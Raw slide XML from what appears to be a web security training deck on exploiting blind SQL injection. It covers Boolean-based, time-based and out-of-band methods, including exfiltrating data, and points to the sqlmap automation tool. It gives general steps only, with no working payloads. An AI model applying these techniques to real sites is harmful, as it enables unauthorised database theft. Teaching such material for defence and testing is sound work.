                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>information</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-195">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>from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210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database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16149319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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-270"/>
              <a:t>Boolean-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1170"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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81921" y="2643555"/>
            <a:ext cx="15304769" cy="251587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459"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>condition </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>evaluates </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>False </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>not</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-810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 </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr sz="395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spcBef>
                <a:spcPts val="365"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Boolean </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>condition </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-190">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>evaluates </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>True </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>note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795">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="389255" marR="346075" indent="-377190">
              <a:lnSpc>
                <a:spcPts val="4290"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="885"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>conditional </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statements </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ask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675">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>series </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-254">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>True </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="430">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-484">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-330">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>False </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response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14697710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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-360"/>
              <a:t>Time-Based </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>Blind</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-1070"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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59074" y="2708892"/>
            <a:ext cx="15151735" cy="24409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577850" marR="426084" indent="-565785">
              <a:lnSpc>
                <a:spcPct val="100600"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="577850" algn="l"/>
                <a:tab pos="578485" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-160">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payload </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-275">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>pauses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-40">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-105">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>application </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-10">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>specified </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>period</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-640">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time</a:t>
            </a:r>
            <a:endParaRPr sz="3950">
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="577850" marR="5080" indent="-565785">
              <a:lnSpc>
                <a:spcPts val="4790"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="85"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="577850" algn="l"/>
                <a:tab pos="578485" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-55">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Write </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-145">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>program </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>that </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>uses </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>conditional </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>statements </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="35">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ask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675">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-305">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>a  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-204">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>series </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>of </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-555">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>TRUE </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="430">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>/ </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-650">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>FALSE </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-150">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>questions </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>monitor</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-750">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>response </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3950" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>time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1242504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80"/>
              <a:t>Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-345"/>
              <a:t>Out-of-Band</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-860"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-335"/>
              <a:t>SQLi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4752" y="2931714"/>
            <a:ext cx="16623030" cy="283273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89255" marR="5080" indent="-377190">
              <a:lnSpc>
                <a:spcPct val="90300"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="650"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-180">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Submit </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-630">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>OAST </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-235">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>payloads </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-225">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>designed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-85">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>trigger </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>out-of-band </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>network  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-80">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interaction </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-140">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>when </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>executed </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>within </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-240">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>an </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-185">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>query, </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-210">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>and </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-30">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>monitor </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-5">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>for</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-660">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-260">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>any  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-120">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>resulting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114">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>interactions</a:t>
            </a:r>
            <a:endParaRPr sz="460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spcBef>
                <a:spcPts val="1070"/>
              </a:spcBef>
              <a:buChar char="•"/>
              <a:tabLst>
                <a:tab pos="389890" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-215">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Depending </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-135">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-685">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-70">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>injection </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-300">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>use </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>different </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-155">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>methods </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="45">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-90">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>exfil</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-565">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4600" spc="-170">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>data</a:t>
            </a:r>
            <a:endParaRPr sz="4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752" y="877632"/>
            <a:ext cx="1320736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15"/>
              <a:t>Automated </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-400"/>
              <a:t>Exploitation</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-915"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-47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2112972" y="4092378"/>
            <a:ext cx="6045344" cy="312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67850" y="8222442"/>
            <a:ext cx="173482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150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-285" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-150" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>l</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-210" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>m</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-180" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-204" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>p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1424" y="8902631"/>
            <a:ext cx="6088380" cy="113411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5"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-50">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>https://github.com/sqlmapproje  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="3600" spc="-75">
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>ct/sqlmap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712872" y="3605089"/>
            <a:ext cx="1460435" cy="1404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3687331" y="3278863"/>
            <a:ext cx="5033645" cy="4397375"/>
            <a:chOff x="13687331" y="3278863"/>
            <a:chExt cx="5033645" cy="4397375"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="object 8"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="13687331" y="3633941"/>
              <a:ext cx="2178572" cy="11437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668004" y="3278863"/>
              <a:ext cx="3052681" cy="17476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687331" y="5031532"/>
              <a:ext cx="2644631" cy="264469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438033" y="5229704"/>
              <a:ext cx="2094176" cy="209417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11369971" y="5446455"/>
            <a:ext cx="1863570" cy="17601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975731" y="8302858"/>
            <a:ext cx="7040880" cy="137287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535430" marR="5080" indent="-1523365">
              <a:lnSpc>
                <a:spcPts val="5260"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="345"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-195" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
              </a:rPr>
              <a:t>Web </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="4450" spc="-225" b="1">
                <a:latin typeface="Trebuchet MS"/>
                <a:cs typeface="Trebuchet MS"/>
